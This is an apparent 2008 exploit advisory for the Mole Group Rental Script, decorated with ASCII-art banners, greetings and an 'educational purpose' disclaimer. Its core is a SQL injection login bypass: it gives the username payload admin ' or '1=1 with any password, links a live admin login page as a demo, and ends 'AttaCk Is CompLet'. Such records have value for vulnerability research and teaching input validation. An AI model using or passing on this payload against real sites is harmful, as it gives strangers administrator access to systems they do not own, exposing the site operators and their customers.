Mole Group Rental Script Auth Bypass SQL Injection Vuln

Document Sample
Mole Group Rental Script Auth Bypass SQL Injection Vuln Powered By Docstoc
					                           Mole Group Rental Script Auth Bypass SQL Injection Vuln                                                    Page 1/3
  1    *********************************************************************************************************************
       **************************************
  2    [!]
                                             [!]
  3    [!]                                      OOOO                O                                    OOOOOOOOO
                                             [!]
  4    [!]                                    O       O             O                                    O            O
                                             [!]
  5    [!]                                    O                     O                                               O
                                             [!]
  6    [!]                                    O         OOOO OOOO OOOOOO          OOOO   OOO OO                   O         OOOO     OO OO
       OOOO                                  [!]
  7    [!]                                    O          OOO OOO O         O    O      O   OO O                 O         O      O    OO O      O
            O                                [!]
  8    [!]                                    O            OO OO    O      O    OOOOOO     O     *******      O           O      O    O    O    O
       OOOOO                                 [!]
  9    [!]                                    O       O     OOOO    O      O    O          O                O           O O      O    O    O    O
                                             [!]
  10   [!]                                      OOOO          OO    OOOOOO        OOOO   OOOOOO            OOOOOOOOO OOOO            OOO OOO
       OOOO                                  [!]
  11   [!]                                                  OO
                                             [!]
  12   [!]                                                 OO
                                             [!]
  13   [!]                                               OO                              Proud To Be MoroCCaN
                                             [!]
  14   [!]                                              OO
                                             [!]
  15   *********************************************************************************************************************
       **************************************
  16     +−−−−                                                               Bismi Allah Irahmani ArraHim
                                           −−−−+
  17   ++−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
  18   ++                                             [     Mole Group Rental Script(Auth Bypass) SQL Injection Vulnerability ]
                                                  ++
  19   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−++
  20   :    Author    : Cyber−Zone    ( Abdelkhalek)                                                                               :         :
                                                :
  21   ¦     E−MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                                          ¦         Â
       ¦                                             ¦
  22   ¦     Home     : WwW.IQ−Ty.CoM                                                                                               ¦         Â
       ¦           MySQL Version Is :                ¦
  23   ¦     From     : MoroCCo                                                                                                     ¦         Â
       ¦                                             ¦
  24   ¦     Script   : http://www.mole−group.com                                                                                   ¦         Â
       ¦                  ![ ]!                      ¦
  25   ¦     Download : http://www.mole−group.com/content/view/32/46/                                                               ¦         Â
       ¦                                             ¦
  26   ¦     RisK     : High [¦¦¦¦¦¦¦¦]                                                                                               ¦
                ¦                                             ¦
Cyber−Zone                                                                                                                            11/07/2008
                           Mole Group Rental Script Auth Bypass SQL Injection Vuln                                Page 2/3
  27   ¦ −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+       +−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− ¦
  28   ¦                                                          From The Dark Side Of MoroCCo
                                            ++
  29   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−++
  30   :
                                            :
  31   ¦ Remember     :
                                              ¦
  32   ¦ −−−−−−−−−−−−−
                                              ¦
  33   ¦
                                              ¦
  34   ¦ This information is only for educational purpose, Cyber−Zone will not bear responsibility for any damages.
                                              ¦
  35   ¦
                                              ¦
  36
  37   ++−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
  38   ++        [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaL
       o , Wal9adimo Al3an [!]             ++
  39   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−++
  40
  41
  42   Bypass : ........
  43
  44   Go To The Admin Panel.
  45   and Login with this information :
  46
  47   username : admin ’ or ’ 1=1
  48   password : Cyber−Zone or any thing you want :)
  49
  50   yeah bro you   loged in dont worry :)
  51
  52   and this is a live demo :
  53   http://rent.mole−group.com/admin/login.php?in_login=yes&retpage=%2Fadmin%2Findex.php
  54
  55   EnjoY.
  56
  57
  58
  59   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−++
  60   +−−−−                                                                  ThanX To
                                        −−−−+
  61   ++−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
  62   ++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda−Lord , $ GeneraL , $ Force−Major
        , $ WaLid , $ Oujda & Figuig City ]++
Cyber−Zone                                                                                                         11/07/2008
                        Mole Group Rental Script Auth Bypass SQL Injection Vuln                                   Page 3/3
  63   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−++
  64   =                                                                    [AttaCk Is CompLet]
                                            =
  65   _____________________________________________________________________________________________________________________
       ______________________________________
  66
  67   # milw0rm.com [2008−11−07]




Cyber−Zone                                                                                                         11/07/2008

				
DOCUMENT INFO